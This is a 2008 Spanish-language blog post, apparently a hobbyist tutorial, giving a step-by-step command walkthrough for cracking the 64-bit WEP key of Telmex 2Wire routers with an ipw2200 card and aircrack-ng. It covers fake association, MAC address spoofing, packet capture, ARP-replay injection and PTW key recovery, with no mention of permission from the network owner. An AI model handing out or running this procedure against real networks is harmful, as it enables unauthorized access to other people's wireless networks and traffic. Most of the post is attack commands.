24 febrero, 2008

inyeccion con ipw2200 sobre 2Wire de Telmex con wep de 64 bits

Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200

bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:

tengo entendido que solo se pueden usar los ataques con este metodo

2 (--interactive)
3 (--arpreplay)
4 (--chopchop)


2)primero haz un scan con

iwlist dispositivo scan

y apunta el mac del AP y el canal esto es importante

3) opcional compila e instala el aircrack siempre lo hago xD ----
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
----------------------------------------------------------------

4)ahora activamos la interfaz de rtap

quitamos el modulo de ipw2200
modprobe -r ipw2200

si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 - create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface

cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1

con esto activamos la interfaz rtap

5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay

iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

6)levantamos las interfaces

ifconfig eth1 up
ifconfig rtap0 up

si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1...

7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng --channel --bssid -w jijoju rtap0
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados

8)ahora abrimos aireplay
aireplay-ng --arpreplay -x 1024 -b bssid ap -h tumac -i rtap0 eth1
--arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress (puedes cambiarla (siempre lo hago) usando ifconfig eth1 hw ether 00:11:22:33:44:55 o lo que se te ocurra)
-i que capture de este dispositivo (s)


9)esperamos un rato yo me espero a las 100000 iv's

despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z

aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)




tiempo estimado ... 10 minutos
mas info aqui

Publicar un comentario